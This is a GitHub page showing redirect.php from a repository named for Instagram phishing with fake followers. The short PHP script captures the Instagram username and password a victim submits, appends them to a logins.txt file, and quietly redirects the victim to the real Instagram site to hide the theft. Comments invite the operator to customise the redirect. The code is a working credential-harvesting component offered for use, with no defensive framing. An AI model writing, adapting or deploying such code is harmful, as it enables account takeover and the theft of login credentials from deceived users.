forked from XploitWizer-Community/FakeFollowerInstaPhishing
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathredirect.php
31 lines (20 loc) · 807 Bytes
/
redirect.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
//Devloper : XploitWizer
//Website : https://xploitwizer.me
//GitHub : https://github.com/XploitWizer
<?php
session_start();
if (isset($_POST['gsubmit'])){
$email=$_POST["instaName"];
$pass = $_POST["pass"];
//opening logins text file for appending new data.
$file = fopen("logins.txt", "a") or die("Unable to open file!");
//Writing email and password to logins.txt.
fwrite($file, $email.">".$pass.PHP_EOL);
fclose($file);//closing logins.txt.
//redirecting user to the google drive's locations where the game is available to download.
//change the location url to redirect to a website of your choice.
header("Location: https://www.instagram.com");
exit();
}
session_destroy();
?>